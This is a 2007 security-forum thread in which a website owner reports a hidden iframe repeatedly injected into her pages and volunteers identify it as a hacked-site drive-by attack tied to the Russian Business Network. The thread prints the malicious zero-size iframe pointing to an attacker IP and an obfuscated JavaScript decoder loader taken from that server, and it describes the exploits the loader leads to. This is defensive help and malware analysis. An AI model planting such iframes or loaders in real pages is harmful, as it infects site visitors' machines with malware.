 |
Spyware Warrior
Help with Spyware, Hijacking & Other Internet Nuisances
|
| View previous topic :: View next topic |
| Author |
Message |
Elektra
Newbie
Joined: 13 Jul 2007
Last Visit: 24 Jul 2007
Posts: 6
Location: USA
|
 Posted: Fri Jul 13, 2007 5:12 pm Post subject: spam on my page? |
 |
|
OK, recently some of my friends who visited my site said that every time they went on it their firewall would go off. Well I figured out a couple of weeks ago what it was. On every "index.php" page(and one or two .htm/.html pages) this link would appear at the bottom of the page. I deleted it from every index page it appeared on. This afternoon it reappeared and I deleted it again.
But it's back for a THIRD time:
| Code: |
| <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> |
I searched up the IP, and found some sites that said it linked to a trojan virus.I really don't know what to do. Can anyone help? |
|
| Back to top |
|
 |
suzi
Site Admin
Joined: 27 Jul 2003
Last Visit: 25 May 2013
Posts: 10271
Location: sunny California
|
| Posted: Fri Jul 13, 2007 6:41 pm Post subject: |
|
|
Elektra,
It would appear your website has been hacked. Somehow hackers gained access to it and added code to the pages.
Is your website on a shared server, sometimes called virtual hosting? Or do you have a dedicated server for your site?
Who is in charge of the server?
Also, if you are using a php program, like Wordpress, or a php forum, for example, and the progams are not updated to the laterst versions, they can be hacked due to vulerabliities in the software.
You should contact the webhosting company right away and explain what has been happening.
Unfortunatly website hacking has become more and more common in the last year. Hackers will hack anything they can get into and use it for malicious purposes.
The IP address in that iframe link belongs to known internet criminals.
http://whois.domaintools.com/81.95.145.240
I can't get this page to load right now, but it tells the history of these criminals.
http://www.spamhaus.org/SBL/sbl.lasso?query=SBL43489
I will look at your site in my virtual machine and see if I can find any more info, but you you need to contact your hosting company right away and tell them what happened. They should be able to help you secure your site, or secure their servers to prevent the hackers from getting back in.
Is it the site in your homepage link? If so, I would request you to remove the link from your profile because we don't want anyone clicking on it from here and getting infected with a trojan.
Thanks.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn.  |
|
| Back to top |
|
|
Elektra
Newbie
Joined: 13 Jul 2007
Last Visit: 24 Jul 2007
Posts: 6
Location: USA
|
| Posted: Fri Jul 13, 2007 6:54 pm Post subject: |
|
|
*headdesk* Hacked? Aghhh this sucks so much 
OK, I will contact my web hosting company right away.
And umm, I'm not sure who's in charge of the server, how do I find that out?
And thanks for the links, I'll take a look at those |
|
| Back to top |
|
|
Elektra
Newbie
Joined: 13 Jul 2007
Last Visit: 24 Jul 2007
Posts: 6
Location: USA
|
| Posted: Fri Jul 13, 2007 7:33 pm Post subject: |
|
|
| Quote: |
Removal Procedure
As this is a known professional spam operation, it is important that all service to the Russian Business Network spam operation be terminated before this listing can be removed from the SBL. There can be no functioning web site, mail or DNS server still serving the spam operation in 81.95.144.0/20.
To have record SBL43489 (81.95.144.0/20) removed from the SBL, the Abuse/Security representative of RIPE (or the Internet Service Provider responsible for connectivity to 81.95.144.0/20) needs to contact the SBL Team to advise how the spam problem has been terminated.
|
So does this mean that I should delete my site until everything is sorted out? |
|
| Back to top |
|
|
suzi
Site Admin
Joined: 27 Jul 2003
Last Visit: 25 May 2013
Posts: 10271
Location: sunny California
|
| Posted: Fri Jul 13, 2007 7:47 pm Post subject: |
|
|
Unless you are paying for a virtual private server or have a dedicated server, the hosting company is responsible for the server, but you are responsible to keep the applications updated, like if you have a blog, or a forum.
Ask you hosting company what you should do, because it depends on how they work. I don't know that you should totally delete it, but the hosting company should tell you what to do. You, or they, might be able to block access to it while it gets cleaned up and secured.
Could you send me a PM with the URL again? I see you removed it from your profile, thanks for doing that. I actually went there with my good machine and I got firewall alerts, but no alerts from my AV. I want to check it again on my virtual machine.
Yes, having your website hacked really does suck, but it's happening to a lot of sites, I mean hundreds of thousands of sites.
I recommend you read this:
http://www.stopbadware.org/home/security
See section 5: 5. Hacking attacks to your site
It talks about invisible iframes, which is what is on your site.
It happened to this guy, too. He explains it in his blog:
http://ethanzuckerman.com/blog/?p=1346
Good luck. If you need help explaining to your hosting company what's going on, let me know. I sometimes contact companies about getting hacked sites taken down and cleaned up.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn. |
|
| Back to top |
|
|
Elektra
Newbie
Joined: 13 Jul 2007
Last Visit: 24 Jul 2007
Posts: 6
Location: USA
|
| Posted: Fri Jul 13, 2007 7:51 pm Post subject: |
|
|
Oh, well I contacted already basically paraphrasing what I said here, I said I got hacked of course. I also mentioned this site too.
The support e-mail said they usually get back within two hours, so maybe if they need more info or I need help I'll ask if you could also contact them.
I'm hosted at http://godaddy.com/
And thanks for the more info! |
|
| Back to top |
|
|
suzi
Site Admin
Joined: 27 Jul 2003
Last Visit: 25 May 2013
Posts: 10271
Location: sunny California
|
| Posted: Fri Jul 13, 2007 7:52 pm Post subject: |
|
|
Oh, in the quote, they are talking about that IP address, not saying you should take down your site.
_________________
Former Microsoft MVP 2005-2009, Consumer Security
Please do not PM or Email me for personal support. Post in the Forums instead and we will all learn. |
|
| Back to top |
|
|
Elektra
Newbie
Joined: 13 Jul 2007
Last Visit: 24 Jul 2007
Posts: 6
Location: USA
|
| Posted: Fri Jul 13, 2007 8:01 pm Post subject: |
|
|
| suzi wrote: |
| Oh, in the quote, they are talking about that IP address, not saying you should take down your site. |
Ohh ok, I read it wrong then |
|
| Back to top |
|
|
olliver
Expert Developer
Joined: 27 Jan 2006
Last Visit: 02 Dec 2010
Posts: 1157
Location: yes
|
| Posted: Sat Jul 14, 2007 8:47 am Post subject: Re: spam on my page? |
|
|
| Elektra wrote: |
| Code: |
| <iframe src='http://81.95.145.240/go.php?sid=1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> |
I searched up the IP, and found some sites that said it linked to a trojan virus. |
Elektra, as Suzi already pointed out, you had the pleasure of meeting one of the worst Russian criminal gangs under the umbrella or the "Russian Business Network". I've already seen several such hacked sites and they are often linked to Iframecash and similar "affiliate programmes":
| Quote: |
Q: What must I do if I want to work with iframeDOLLARS.biz partnership program?
A: 1. You must be registered here
2. You should put a short one line iframe code which will be given to you on your page(s). And our program will be installed to users in hidden iframe
Q: How much will I be paid per install?
A: We will pay you $80/1000 unique installs and more. It depends on your traffic volume
Q: Do you pay for unique or for all installs?
A: We pay for unique installs |
Source: http ://iframedollars.biz/faq.php?lang=en
Well you get the idea, they make money of planting funky iframe sites, running exploits and have their victims machines infested with all sorts of crapware. Some affiliates prefer finding vulnerable sites like yours rather than incorporating the iframe one-liner into their sites, because it won't cost them *their* money if the site will be taken down by the hosting company. As you may figure out yourself, complaining to iframedollars about the rogue affiliate won't get you anywhere...
Btw, it appears as if 81.95.145.240 is down:
| Quote: |
[olliver@bunkiten ~]$ traceroute 81.95.145.240
traceroute to 81.95.145.240 (81.95.145.240), 30 hops max, 40 byte packets
[...]
6 ffm-145-254-16-18.arcor-ip.net (145.254.16.18 ) 51.912 ms 49.654 ms 52.177 ms
7 cr02.frf02.pccwbtn.net (80.81.192.50) 54.275 ms 19.888 ms 22.627 ms
8 rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 42.967 ms 44.472 ms 47.504 ms
9 * * *
10 * * *
11 * * *
12 * * *
13 * * *
14 * * *
15 * * *
[...] |
looks like their upstream is no longer routing them
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe. |
|
| Back to top |
|
|
ld
Warrior
Joined: 01 Mar 2005
Last Visit: 29 Jul 2010
Posts: 185
|
| Posted: Sat Jul 14, 2007 3:31 pm Post subject: |
|
|
I'm not sure why a notepet wasn't able to reach the site but unfortunately I had no problem.
| Code: |
traceroute to 81.95.145.240 (81.95.145.240), 64 hops max, 40 byte packets
1 10.59.160.1 (10.59.160.1) 13.626 ms 10.822 ms 11.143 ms
2 ge5-0-nycmnyr-rtr4.nyc.rr.com (24.29.130.29) 9.604 ms 8.118 ms 7.105 ms
3 pos3-0-nycmnyr-rtr2.nyc.rr.com (24.29.130.41) 18.137 ms 8.266 ms 13.388 ms
4 pos3-0-nycmnya-rtr1.nyc.rr.com (24.29.97.29) 7.512 ms 10.283 ms 19.564 ms
5 tenge-2-0-0.nwrknjmd-rtr.nyc.rr.com (24.29.119.110) 9.185 ms 10.245 ms 8.807 ms
6 te-4-3.car1.Newark1.Level3.net (4.79.188.113) 11.442 ms 10.332 ms 7.941 ms
7 ae-1-51.bbr1.Newark1.Level3.net (4.68.99.1) 9.333 ms ae-1-53.bbr1.Newark1.Level3.net (4.68.99.65) 9.424 ms ae-1-55.bbr1.Newark1.Level3.net (4.68.99.129) 39.173 ms
8 ae-1-0.bbr1.London1.Level3.net (212.187.128.58) 74.461 ms 74.998 ms as-0-0.bbr2.London1.Level3.net (4.68.128.105) 76.434 ms
9 ae-21-54.car1.London1.Level3.net (4.68.116.111) 79.183 ms ae-21-52.car1.London1.Level3.net (4.68.116.47) 76.470 ms ae-21-54.car1.London1.Level3.net (4.68.116.111) 79.89 ms
10 84-45-24-53.c4l.co.uk (84.45.24.53) 76.718 ms 85.711 ms 75.556 ms
11 ringo-wolverine.c4l.co.uk (84.45.90.141) 79.357 ms 79.533 ms 82.597 ms
12 84.45.47.130 (84.45.47.130) 77.668 ms 85.400 ms 94.830 ms
13 gbit-eth-34-uk.sbttel.com (81.95.156.34) 127.744 ms 128.676 ms 139.458 ms
14 oc-3-sbttel.rbnnetwork.com (81.95.156.74) 135.95 ms 129.562 ms 132.172 ms
15 81.95.145.240 (81.95.145.240) 123.836 ms 125.157 ms 126.680 ms
|
I was also able to pull down the link in the iframe source which just contains some obfuscated java script. I would say it is safe to say it is still very much alive and dangerous.
This does look like mpack. Basically they hack the webserver and try to add this line to all web files on the server. If it is shared hosting it may not be your site that is being exploited but due to poor security once they exploit one site they may be able to modify any site on that server. |
|
| Back to top |
|
|
suzi
Site Admin
Joined: 27 Jul 2003
Last Visit: 25 May 2013
Posts: 10271
Location: sunny California
|
|
| Back to top |
|
|
JeanInMontana
Warrior
Joined: 16 Jan 2005
Last Visit: 22 Dec 2008
Posts: 177
Location: South Central Montana, USA
|
| Posted: Sat Jul 14, 2007 9:29 pm Post subject: |
|
|
I was going to suggest Essex hosting. ChrisRLG and his gang do nothing but help with this type situation and monitor sites.
_________________
Hoax~Slayer * hpHosts * T.I.C. * Malwarebytes * A.S.A.P. Member 2004 |
|
| Back to top |
|
|
olliver
Expert Developer
Joined: 27 Jan 2006
Last Visit: 02 Dec 2010
Posts: 1157
Location: yes
|
| Posted: Sun Jul 15, 2007 12:18 am Post subject: |
|
|
| ld wrote: |
| I'm not sure why a notepet wasn't able to reach the site but unfortunately I had no problem. |
That's quite easy to explain if you look at the route. That's your last hop before RBN:
84.45.47.130 (84.45.47.130) 77.668 ms 85.400 ms 94.830 ms
See how it differs from mine?
rbn.fe3-29.br02.ldn01.pccwbtn.net (63.218.52.114) 42.967 ms 44.472 ms 47.504 ms
That probably means that BTN, the upstream responsible for my route, acted responsibly and null routed this malware source. That's astonishing because BTN is otherwise known as spam friendly ISP and hardly acts on any complaints. Anyway your route differs as it goes via Level3 and C4l with 84.45.47.130 being their border router to RBN.
| Quote: |
| I was also able to pull down the link in the iframe source which just contains some obfuscated java script. I would say it is safe to say it is still very much alive and dangerous. |
From your perspective as RoadRunner customer for sure. From mine as a customer of Arcor (Germany), with the different routing, that's no longer true for this destination. Other ip addresses within this /24 however are still reachable for me, too. I would think that if RBN had an axe to grind with me, they surely would ban my presumable ip addresses for their entire net, and not just that one swerver, wouldn't they?
| Quote: |
| Basically they hack the webserver and try to add this line to all web files on the server. If it is shared hosting it may not be your site that is being exploited but due to poor security once they exploit one site they may be able to modify any site on that server. |
Careful with "they": We do not know by whom this has been done and even for a rogue network we shouldn't assume collective punishment to be appropriate. I think it's safe to assume though that some rogue affiliates find this method of earning money more lucrative than putting the iframe code on the handful of sites they themselves own.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe. |
|
| Back to top |
|
|
olliver
Expert Developer
Joined: 27 Jan 2006
Last Visit: 02 Dec 2010
Posts: 1157
Location: yes
|
| Posted: Sun Jul 15, 2007 12:28 am Post subject: |
|
|
| suzi wrote: |
That site is monitoring IPs and if you try to go there a second time, it says your IP is blocked. That's not terribly unusual either. Nice of them to not exploit you more than once.   |
Well it's the owner's bidniz and (s)he has to make sure to minimise the risk of unwanted visitors. In my case, however, the destination is unreachable, so I never got the chance to see that funny message. I'm going to try from another address later today and hope to be more successful  .
| Quote: |
| The OP here is getting some behind the scenes help with this in case anyone was wondering. |
That's good news. Also this may be good evidence for the likes of Spamhaus, I'm sure they gladly accept more data for their ROKSO record of RBN.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe. |
|
| Back to top |
|
|
olliver
Expert Developer
Joined: 27 Jan 2006
Last Visit: 02 Dec 2010
Posts: 1157
Location: yes
|
| Posted: Sun Jul 15, 2007 12:50 am Post subject: |
|
|
| a notepet wrote: |
| I'm going to try from another address later today and hope to be more successful . |
Lucky me, I was able to get through via another server. The exploit code requires Javascript, else nothing is happening. This is the source:
| Quote: |
<script language=JavaScript>function decipher(x){
var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,36,35,27,14,52,8,48,5,49,0,0,0,0,0,0,9,1,11,44,30,10,21,57,39,13,38,19,18,20,7,61,56,55,24,47,42,12,23,29,28,62,22,0,0,0,0,0,0,46,45,54,50,6,4,37,53,2,59,15,58,51,16,32,33,40,3,26,60,41,34,31,25,17,43);
for(j=Math.ceil(l/b);j>0;j--){
r='';
for(i=Math.min(l,b);i>0;i--,l--){
w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){
r+=String.fromCharCode(165^w&255);
w>>=8;s-=2}
else{s=6}
}
document.write(r)}
}
decipher("8Jxmy2Xd3JG9ENUQ3eI7ZNWpFKC7_HuvNzX7XSxJEcX56HtJ")</script> |
(slight reformatting applied for better readability)
First part defines a decoding procedure which is run in the main part (with the encrypted string as argument). Debugging this code with Opera only gets me as far as:
| Quote: |
<localhost>
<html><body>test page</body></html> |
Probably IE specific code. I may have to try again with a Windows Machine and IE, perhaps that'll be more successful.
Olliver
_________________
Petcord netlabel :: Synflict post-digital arts :: Leftob audio cast
Each click on any of the links above will save the life of a cute kitty somewhere in the universe. |
|
| Back to top |
|
|
ld
Warrior
Joined: 01 Mar 2005
Last Visit: 29 Jul 2010
Posts: 185
|
| Posted: Sun Jul 15, 2007 8:02 am Post subject: |
|
|
| You are right, it does look at the User Agent string of your browser. Change it to something like "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" and you will get much different results. The blocks seem to be on a page by page basis. This obfuscated javascript links to several files on another server on the same /16. When I tried to get a directory listing I get the message that I was blocked. Tried from a different IP and got the same javascript I'm analyzing now(so no directory listing it spit index.php at me). Back to my original IP that is blocked I grabbed the .jar file and had no problem getting it. The IP blocking is just to keep you from executing the same script multiple times but won't keep you from getting the other dangerous files you have not yet recieved... When you decode that javascript it starts by loading a java applet and then has a decent size javascript to run. Going by the applets name it sounds like it is an exploit for MS0-311 which deals with a bug in the microsoft virtual machine and is from 2003. At the very end you see a link to a page ms07-017.php which the name sounds like a GDI exploit. There is a lot more going on in there those are just the things that stand out. |
|
| Back to top |
|
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
smartBlue Style © 2002 Smartor
Powered by phpBB © 2001, 2002 phpBB Group
|
